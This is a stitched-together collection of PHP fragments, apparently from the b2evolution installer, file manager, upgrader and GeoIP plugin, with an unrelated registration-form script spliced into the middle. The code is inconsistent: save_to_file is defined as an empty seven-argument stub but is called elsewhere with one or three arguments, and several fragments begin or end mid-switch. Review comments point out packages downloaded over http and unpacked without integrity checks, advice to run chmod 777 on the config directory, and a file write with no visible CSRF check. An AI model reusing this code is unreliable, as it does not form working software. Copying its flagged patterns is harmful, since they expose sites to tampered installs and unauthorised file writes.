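$download_url_ok = is_array($url_parts)
    && !empty($url_parts['scheme'])
    && !empty($url_parts['host'])
    && in_array(strtolower($url_parts['scheme']), array('http', 'https'), true);

// NOTE(review): the package is not integrity-checked here (no digest or signature
// is visible) and plain http is accepted, so whoever controls the URL or the
// network path controls what gets installed. Restricting the host to the
// project's download servers and verifying a published digest before unpacking
// would close that gap.

$success = false;
if (!$upgrade_name_ok) {
    echo '<p style="color:red">' . T_('Invalid package name.') . '</p>';
    evo_flush();
} elseif (!$download_url_ok) {
    echo '<p style="color:red">' . sprintf(T_('Unable to download package from «%s»'), htmlspecialchars($download_url)) . '</p>';
    evo_flush();
} elseif ($success = prepare_maintenance_dir($upgrade_path, true)) {
    // Set maximum execution time
    set_max_execution_time(1800); // 30 minutes

    echo '<p>' . sprintf(T_('Downloading package to «<strong>%s</strong>»...'), htmlspecialchars($upgrade_file));
    evo_flush();

    // Downloading
    $file_contents = fetch_remote_page($download_url, $info, 1800);

    if (empty($file_contents)) {
        $success = false;
        echo '</p><p style="color:red">' . sprintf(T_('Unable to download package from «%s»'), htmlspecialchars($download_url)) . '</p>';
    } elseif (!save_to_file($file_contents, $upgrade_file, 'w')) {
        // Impossible to save file...
        $success = false;
        echo '</p><p style="color:red">' . sprintf(T_('Unable to create file: «%s»'), htmlspecialchars($upgrade_file)) . '</p>';

        if (file_exists($upgrade_file)) {
            // Remove the partial file from disk
            if (!@unlink($upgrade_file)) {
                echo '<p style="color:red">' . sprintf(T_('Unable to remove file: «%s»'), htmlspecialchars($upgrade_file)) . '</p>';
            }
        }
    } else {
        // The package is downloaded successfully
        echo ' OK.</p>';
    }
    evo_flush();
}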
/**
 * Decode a base64 string and hand the decoded bytes to save_to_file().
 *
 * @param string $data base64 text
 * @return void
 */
function convert_data($data)
{
    // NOTE(review): the decoded bytes are passed on without any check of what
    // they contain; if $data comes from a request, validate type and size
    // before it is stored.
    save_to_file(base64_decode($data));
}
/**
 * Generate .POT file
 *
 * Builds messages.pot in $locales_path from the strings that
 * translation_scandir() finds under $basepath, including TRANS notes,
 * file:line references and php-format flags. Adds an error to $Messages when
 * the file cannot be written.
 *
 * @return boolean true when the file was written
 */
function translation_generate_pot_file()
{
    global $DB, $locales_path;
    global $basepath;

    $pot_file_name = $locales_path . 'messages.pot';

    // File header
    $pot_content = array(
        '# b2evolution - Language file',
        '# Copyright (C) ' . date('Y') . ' Francois PLANQUE',
        '# This file is distributed under the same license as the b2evolution package.',
        '',
    );

    $translation_strings = array();
    translation_scandir($basepath, $translation_strings);

    foreach ($translation_strings as $string => $files) {
        // Translator notes come first and are taken out of the reference list
        if (isset($files['trans'])) {
            $trans_info = $files['trans'];
            if (!is_array($trans_info)) {
                // Single TRANS info
                $pot_content[] = '#. TRANS: ' . $trans_info;
            } else {
                // Multiline TRANS info: only the first line carries the prefix
                foreach ($trans_info as $ft => $files_trans) {
                    $line_prefix = $ft == 0 ? 'TRANS: ' : '';
                    $pot_content[] = '#. ' . $line_prefix . $files_trans;
                }
            }
            unset($files['trans']);
        }

        // File name and line number where string exists
        foreach ($files as $file) {
            $pot_content[] = '#: ' . $file[1] . ':' . $file[0];
        }

        // Flag strings containing '%': a %s or %d mask marks a format string,
        // any other '%' is a plain character
        if (strpos($string, '%') !== false) {
            $pot_content[] = preg_match('/%(s|\\d*d)/', $string)
                ? '#, php-format'
                : '#, no-php-format';
        }

        array_push($pot_content, 'msgid "' . $string . '"', 'msgstr ""', '');
    }

    // Write to .POT file
    $ok = (bool) save_to_file(implode("\n", $pot_content), $pot_file_name, 'w+');
    if ($ok) {
        return $ok;
    }

    // Inform user about no permission to write POT file
    global $Messages;
    $Messages->add(sprintf(T_('The file %s cannot be written to disk. Please check the filesystem permissions.'), '<b>' . $pot_file_name . '</b>'), 'error');

    return $ok;
}
/**
 * Store one registration record in $filename.
 *
 * Not implemented yet: the body is empty, so nothing is written.
 * NOTE(review): the caller passes the relative name "users.txt"; once this is
 * implemented, keep that file outside the web root, since it will hold
 * personal data.
 */
function save_to_file($filename, $name, $email, $year, $month, $day, $sex)
{
    // TODO
}

// read in form values
$name = get_value_post("name");
$email = get_value_post("email");
$year = get_value_post("year");
$month = get_value_post("month");
$day = get_value_post("day");
$sex = get_value_post("sex");
$terms = get_value_post("terms");

// check if the form has been submitted -- any of the input values is set
$submitted = isset($_POST['name']);

if (!$submitted) {
    // display form for the first time
    display_form();
} else {
    // check for errors
    $errors = input_check($name, $email, $year, $month, $day, $sex, $terms);
    if (count($errors) > 0) {
        // show the form again, with the entered values and the error list
        display_form($name, $email, $year, $month, $day, $sex, $terms, $errors);
    } else {
        // valid submission: show the confirmation, then store the record
        confirm($name, $email, $year, $month, $day, $sex);
        save_to_file("users.txt", $name, $email, $year, $month, $day, $sex);
    }
}
?> </body> </html>
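/**
 * Quote a value for insertion into the generated config file.
 *
 * Two layers are applied: first the value is escaped for a single-quoted PHP
 * string literal (backslash and quote), then for a preg_replace() replacement
 * string (backslash and dollar), so that neither layer interprets any part of
 * the value.
 *
 * @param string value entered in the installer
 * @return string text that is safe between single quotes in a replacement string
 */
function _basic_config_quote_value($value)
{
    $php_literal = addcslashes((string) $value, "\\'");

    return addcslashes($php_literal, '\\$');
}

/**
 * Update file /conf/_basic_config.php
 *
 * Checks the database settings by connecting, then fills them into the config
 * template and writes the result. On success the globals $baseurl,
 * $admin_email, $config_is_done and $action are updated. When the file cannot
 * be written, manual instructions and the generated contents are displayed.
 *
 * @param array Params: db_user, db_password, db_name, db_host, db_tableprefix,
 *              baseurl, admin_email, print_messages, quick_install
 * @return boolean FALSE when the template cannot be read or the config file
 *                 cannot be written, TRUE otherwise
 */
function update_basic_config_file($params = array())
{
    global $DB, $db_config, $evo_charset, $conf_path, $default_locale;

    // These global params should be rewritten by this function on success result
    global $baseurl, $admin_email, $config_is_done, $action;

    $params = array_merge(array(
        'db_user' => '',
        'db_password' => '',
        'db_name' => '',
        'db_host' => '',
        'db_tableprefix' => '',
        'baseurl' => '',
        'admin_email' => '',
        'print_messages' => true,
        'quick_install' => false,
    ), $params);

    if (!$params['print_messages']) {
        // Start to get all messages instead of printing on screen:
        ob_start();
        // Use this global var to store all messages
        global $basic_config_file_result_messages;
    }

    // Connect to DB:
    $DB = new DB(array(
        'user' => $params['db_user'],
        'password' => $params['db_password'],
        'name' => $params['db_name'],
        'host' => $params['db_host'],
        'aliases' => $db_config['aliases'],
        'connection_charset' => empty($db_config['connection_charset']) ? DB::php_to_mysql_charmap($evo_charset) : $db_config['connection_charset'],
        'halt_on_error' => false,
    ));

    if ($DB->error) {
        // restart conf
        // NOTE(review): this path still ends in "return true" below; callers appear to
        // rely on $action = 'start' rather than on the return value — confirm.
        display_install_messages(T_('It seems that the database config settings you entered don\'t work. Please check them carefully and try again...'));
        $action = 'start';
    } else {
        $conf_template_filepath = $conf_path . '_basic_config.template.php';
        $conf_filepath = $conf_path . '_basic_config.php';

        // Read original:
        $file_loaded = @file($conf_template_filepath);

        if (empty($file_loaded)) {
            // This should actually never happen, just in case...
            // Name the template, which is the file that could not be read.
            display_install_messages(sprintf(T_('Could not load original conf file [%s]. Is it missing?'), $conf_template_filepath));

            if (!$params['print_messages']) {
                // Return all messages instead of printing on screen
                $basic_config_file_result_messages = ob_get_clean();
            }
            return false;
        }

        // File loaded...
        $conf = implode('', $file_loaded);

        // Update conf:
        // The values are written into PHP source that is executed on every request.
        // Every value therefore goes through _basic_config_quote_value(): escaping the
        // quote alone lets a trailing backslash swallow the closing quote, and leaves
        // backslash-digit and dollar-digit sequences to be read as backreferences.
        $conf = preg_replace(
            array(
                '#\\$db_config\\s*=\\s*array\\(
                    \\s*[\'"]user[\'"]\\s*=>\\s*[\'"].*?[\'"], ([^\\n\\r]*\\r?\\n)
                    \\s*[\'"]password[\'"]\\s*=>\\s*[\'"].*?[\'"], ([^\\n\\r]*\\r?\\n)
                    \\s*[\'"]name[\'"]\\s*=>\\s*[\'"].*?[\'"], ([^\\n\\r]*\\r?\\n)
                    \\s*[\'"]host[\'"]\\s*=>\\s*[\'"].*?[\'"], ([^\\n\\r]*\\r?\\n)
                    #ixs',
                "#tableprefix\\s*=\\s*'.*?';#",
                "#baseurl\\s*=\\s*'.*?';#",
                "#admin_email\\s*=\\s*'.*?';#",
                "#config_is_done\\s*=.*?;#",
            ),
            array(
                "\$db_config = array(\n"
                    . "\t'user' => '" . _basic_config_quote_value($params['db_user']) . "',\$1"
                    . "\t'password' => '" . _basic_config_quote_value($params['db_password']) . "',\$2"
                    . "\t'name' => '" . _basic_config_quote_value($params['db_name']) . "',\$3"
                    . "\t'host' => '" . _basic_config_quote_value($params['db_host']) . "',\$4",
                "tableprefix = '" . _basic_config_quote_value($params['db_tableprefix']) . "';",
                "baseurl = '" . _basic_config_quote_value($params['baseurl']) . "';",
                "admin_email = '" . _basic_config_quote_value($params['admin_email']) . "';",
                'config_is_done = 1;',
            ),
            $conf
        );

        // Write new contents:
        if (save_to_file($conf, $conf_filepath, 'w')) {
            display_install_messages(sprintf(T_('Your configuration file <code>%s</code> has been successfully created.') . '</p>', $conf_filepath), 'success');

            $tableprefix = $params['db_tableprefix'];
            $baseurl = $params['baseurl'];
            $admin_email = $params['admin_email'];
            $config_is_done = 1;
            if (!$params['quick_install']) {
                // Switch to menu only on standard installation:
                $action = 'menu';
            }
        } else {
            // The generated file contains the database password; it is shown only so the
            // administrator can create the file by hand.
            // NOTE(review): the instructions below suggest chmod 777 on the conf directory;
            // that is broader than the installer needs and should be tightened again
            // once the file exists.
            ?>
            <h1><?php echo T_('Config file update'); ?> </h1>
            <p><strong><?php printf(T_('We cannot automatically create or update your config file [%s]!'), $conf_filepath); ?> </strong></p>
            <p><?php echo T_('There are two ways to deal with this:'); ?> </p>
            <ul>
                <li><strong><?php echo T_('You can allow the installer to create the config file by changing permissions for the /conf directory:'); ?> </strong>
                    <ol>
                        <li><?php printf(T_('Make sure there is no existing and potentially locked configuration file named <code>%s</code>. If so, please delete it.'), $conf_filepath); ?> </li>
                        <li><?php printf(T_('<code>chmod 777 %s</code>. If needed, see the <a %s>online manual about permissions</a>.'), $conf_path, 'href="' . get_manual_url('directory-and-file-permissions') . '" target="_blank"'); ?> </li>
                        <li><?php echo T_('Come back to this page and refresh/reload.'); ?> </li>
                    </ol>
                    <br />
                </li>
                <li><strong><?php echo T_('Alternatively, you can update the config file manually:'); ?> </strong>
                    <ol>
                        <li><?php echo T_('Create a new text file with a text editor.'); ?> </li>
                        <li><?php echo T_('Copy the contents from the box below.'); ?> </li>
                        <li><?php echo T_('Paste them into your local text editor. <strong>ATTENTION: make sure there is ABSOLUTELY NO WHITESPACE after the final <code>?></code> in the file.</strong> Any space, tab, newline or blank line at the end of the conf file may prevent cookies from being set when you try to log in later.'); ?> </li>
                        <li><?php echo T_('Save the file locally under the name <code>_basic_config.php</code>'); ?> </li>
                        <li><?php echo T_('Upload the file to your server, into the <code>/_conf</code> folder.'); ?> </li>
                        <li><?php printf(T_('<a %s>Call the installer from scratch</a>.'), 'href="index.php?locale=' . $default_locale . '"'); ?> </li>
                    </ol>
                </li>
            </ul>
            <p><?php echo T_('This is how your _basic_config.php should look like:'); ?> </p>
            <blockquote>
            <pre><?php echo htmlspecialchars($conf); ?> </pre>
            </blockquote>
            <?php
            if (!$params['print_messages']) {
                // Return all messages instead of printing on screen
                $basic_config_file_result_messages = ob_get_clean();
            }
            return false;
        }
    }

    if (!$params['print_messages']) {
        // Return all messages instead of printing on screen
        $basic_config_file_result_messages = ob_get_clean();
    }

    return true;
}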
// Fragment of a switch case (the `case` label and the `switch` header are outside this excerpt):
// it overwrites the selected file with the content submitted in the request.
// NOTE(review): no crumb / anti-CSRF check is visible in this fragment; confirm one runs
// earlier in the case or in the controller before this write is reached.

// Check permission!
// NOTE(review): the third argument `true` presumably makes check_perm() abort on failure - confirm.
$current_User->check_perm('files', 'edit_allowed', true, $selected_Filelist->get_FileRoot());

// Get the file we want to update:
$edited_File =& $selected_Filelist->get_by_idx(0);

// Check that the file is editable:
// The result of the 'files'/'all' permission check is passed to is_editable(), so what counts as
// editable depends on that permission. Which file types this admits is decided inside
// is_editable(), which is not visible here.
if (!$edited_File->is_editable($current_User->check_perm('files', 'all'))) {
    $Messages->add(sprintf(T_('You are not allowed to edit «%s».'), $edited_File->dget('name')), 'error');
    break;
}

// Read the new content from the request as type 'html'. $file_content is used below without a
// local assignment, so param() presumably publishes it as a global - confirm.
param('file_content', 'html', '', false);

$fpath = $edited_File->get_full_path();
if (file_exists($fpath) && !is_writeable($fpath)) {
    // Unlike the other messages in this fragment, this one is not passed through T_().
    $Messages->add(sprintf('The file «%s» is not writable.', rel_path_to_base($fpath)), 'error');
    break;
}

// The request content is written to the path resolved from the selected File object, not to a
// path taken from the request.
if (save_to_file($file_content, $fpath, 'w+')) {
    $Messages->add(sprintf(T_('The file «%s» has been updated.'), $edited_File->dget('name')), 'success');
} else {
    $Messages->add(sprintf(T_('The file «%s» could not be updated.'), $edited_File->dget('name')), 'error');
}

// Redirect after the write attempt, whether it succeeded or failed.
header_redirect(regenerate_url('', '', '', '&'));
// $action = 'list';
break;
}

// Do we want to display the directory tree next to the files table
$UserSettings->param_Request('fm_hide_dirtree', 'fm_hide_dirtree', 'integer', 0, true);

/**
 * Filelist
 */
$fm_Filelist = new Filelist($fm_FileRoot, $ads_list_path);
$Debuglog->add('FM _rds_list_path: ' . var_export($fm_Filelist->_rds_list_path, true), 'files');
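/**
 * Event handler: Called when displaying the block in the "Tools" menu.
 *
 * Two actions are handled:
 *  - 'geoip_download': fetches the archive from $this->geoip_download_url, stores it in the
 *    plugin folder, unpacks it next to the archive, removes the archive and then tries to
 *    enable the plugin.
 *  - any other action: prints the form that launches the 'geoip_find_country' action.
 *
 * NOTE(review): the downloaded archive is unpacked and put to use without any checksum or
 * signature verification, and whether the transfer is encrypted depends on the scheme of
 * geoip_download_url, which is not visible here.
 * NOTE(review): no crumb check for the state-changing 'geoip_download' action is visible in
 * this method; confirm the calling controller performs it.
 *
 * @see Plugin::AdminToolPayload()
 *
 * @param array $params Not read by this method.
 */
function AdminToolPayload($params)
{
    $action = param_action();

    echo '<a name="geoip" style="position:relative;top:-60px"></a>';

    switch ($action) {
        case 'geoip_download':
            // Display a process of downloading of GeoIP.dat
            $this->print_tool_log(sprintf(T_('Downloading GeoIP.dat file from the url: %s ...'), '<a href="' . $this->geoip_download_url . '" target="_blank">' . $this->geoip_download_url . '</a>'));

            // DOWNLOAD:
            $gzip_contents = fetch_remote_page($this->geoip_download_url, $info, 1800);
            if ($gzip_contents === false || $info['status'] != 200) {
                // Downloading is Failed
                if (empty($info['error'])) {
                    // Some unknown error
                    $this->print_tool_log(T_('The URL is not available. It may correspond to an old version of the GeoIP.dat file.'), 'error');
                } else {
                    // Display an error of request
                    // NOTE(review): this text comes from fetch_remote_page(); whether
                    // print_tool_log() escapes HTML is not visible here - confirm.
                    $this->print_tool_log(T_($info['error']), 'error');
                }
                break;
            }
            $this->print_tool_log(' OK.<br />');

            $plugin_dir = dirname(__FILE__);
            if (!is_writable($plugin_dir)) {
                // Check the write rights
                $this->print_tool_log(sprintf(T_('Plugin folder %s must be writable to receive GeoIP.dat. Please fix the write permissions and try again.'), '<b>' . $plugin_dir . '</b>'), 'error');
                break;
            }

            // The archive name is the last segment of the download URL.
            // NOTE(review): assumes geoip_download_url is a fixed plugin property - confirm it
            // cannot be changed through settings or request input.
            $gzip_file_name = explode('/', $this->geoip_download_url);
            $gzip_file_name = $gzip_file_name[count($gzip_file_name) - 1];
            $gzip_file_path = $plugin_dir . '/' . $gzip_file_name;

            // Strip only a trailing ".gz"; a ".gz" elsewhere in the name must stay in place.
            // If the name has no ".gz" suffix, the output path equals the archive path.
            $out_file_path = $plugin_dir . '/' . preg_replace('/\.gz$/', '', $gzip_file_name);

            if (!save_to_file($gzip_contents, $gzip_file_path, 'w')) {
                // Impossible to save file...
                $this->print_tool_log(sprintf(T_('Unable to create file: %s'), '<b>' . $gzip_file_path . '</b>'), 'error');
                if (file_exists($gzip_file_path)) {
                    // Remove file from disk
                    if (!@unlink($gzip_file_path)) {
                        // File exists without the write rights
                        $this->print_tool_log(sprintf(T_('Unable to remove file: %s'), '<b>' . $gzip_file_path . '</b>'), 'error');
                    }
                }
                break;
            }

            // UNPACK:
            $this->print_tool_log(sprintf(T_('Extracting of the file %s...'), '<b>' . $gzip_file_path . '</b>'));

            if (!function_exists('gzopen')) {
                // No extension
                $this->print_tool_log(T_('There is no \'zip\' or \'zlib\' extension installed!'), 'error');
                break;
            }

            if (!($gzip_handle = @gzopen($gzip_file_path, 'rb'))) {
                // Try to open gzip file
                $this->print_tool_log(T_('Could not open the source file!'), 'error');
                break;
            }

            if (!($out_handle = @fopen($out_file_path, 'w'))) {
                // Release the archive handle before leaving; it was left open on this path before.
                gzclose($gzip_handle);
                $this->print_tool_log(sprintf(T_('The file %s cannot be written to disk. Please check the filesystem permissions.'), '<b>' . $out_file_path . '</b>'), 'error');
                break;
            }

            $i = 0;
            $extract_ok = true;
            while (!gzeof($gzip_handle)) {
                // Extract file by 4Kb
                $chunk = gzread($gzip_handle, 4096);
                if (!is_string($chunk) || ($chunk === '' && !gzeof($gzip_handle))) {
                    // A failed read, or an empty read that does not reach the end of the
                    // archive, means the archive cannot be decoded; stop here so the loop
                    // cannot keep running without making progress.
                    $extract_ok = false;
                    break;
                }
                if (fwrite($out_handle, $chunk) !== strlen($chunk)) {
                    // Short or failed write (e.g. disk full): the output would be truncated.
                    $extract_ok = false;
                    break;
                }
                if ($i == 100) {
                    // Display the process dots after each 400Kb
                    $this->print_tool_log(' .');
                    $i = 0;
                }
                $i++;
            }
            fclose($out_handle);
            gzclose($gzip_handle);

            if (!$extract_ok) {
                // Do not leave a partial data file behind and do not report success.
                @unlink($out_file_path);
                $this->print_tool_log(sprintf(T_('The file %s could not be extracted. The downloaded archive may be damaged or the disk may be full.'), '<b>' . $gzip_file_path . '</b>'), 'error');
                break;
            }
            $this->print_tool_log(' OK.<br />');

            $this->print_tool_log(sprintf(T_('Remove gzip file %s...'), '<b>' . $gzip_file_path . '</b>'));
            if (@unlink($gzip_file_path)) {
                $this->print_tool_log(' OK.<br />');
            } else {
                // Failed on removing
                $this->print_tool_log(sprintf(T_('Impossible to remove the file %s. You can do it manually.'), $gzip_file_path), 'warning');
            }

            // Success message
            $this->print_tool_log('<br /><span class="text-success">' . sprintf(T_('%s file was downloaded successfully.'), 'GeoIP.dat') . '</span>');

            // Try to enable plugin automatically:
            global $Plugins;
            $enable_return = $this->BeforeEnable();
            if ($enable_return === true) {
                // Success enabling
                $this->print_tool_log('<br /><span class="text-success">' . T_('The plugin has been enabled.') . '</span>');
                if ($this->status != 'enabled') {
                    // Enable this plugin automatically:
                    $Plugins->set_Plugin_status($this, 'enabled');
                }
            } else {
                // Some restriction for enabling
                $this->print_tool_log('<br /><span class="text-warning">' . T_('The plugin could not be automatically enabled.') . '</span>');
                if ($this->status != 'needs_config') {
                    // Make this plugin incomplete because it cannot be enabled:
                    $Plugins->set_Plugin_status($this, 'needs_config');
                }
            }
            break;

        default:
            // Display a form to find countries for users
            if ($this->status != 'enabled') {
                // Don't allow use this tool when GeoIP plugin is not enabled
                echo '<p class="error">' . T_('You must enable the GeoIP plugin before to use this tool.') . '</p>';
                break;
            }

            $Form = new Form();

            $Form->begin_form('fform');

            $Form->add_crumb('tools');
            $Form->hidden_ctrl(); // needed to pass the "ctrl=tools" param
            $Form->hiddens_by_key(get_memorized()); // needed to pass all other memorized params, especially "tab"
            $Form->hidden('action', 'geoip_find_country');

            echo '<p>' . T_('This tool finds all users that do not have a registration country yet and then assigns them a registration country based on their registration IP.') . get_manual_link('geoip-plugin') . '</p>';

            $Form->button(array('value' => T_('Find Registration Country for all Users NOW!')));

            if (!empty($this->text_from_AdminTabAction)) {
                // Display a report of executed action
                echo '<p><b>' . T_('Report') . ':</b></p>';
                echo $this->text_from_AdminTabAction;
            }

            $Form->end_form();
            break;
    }
}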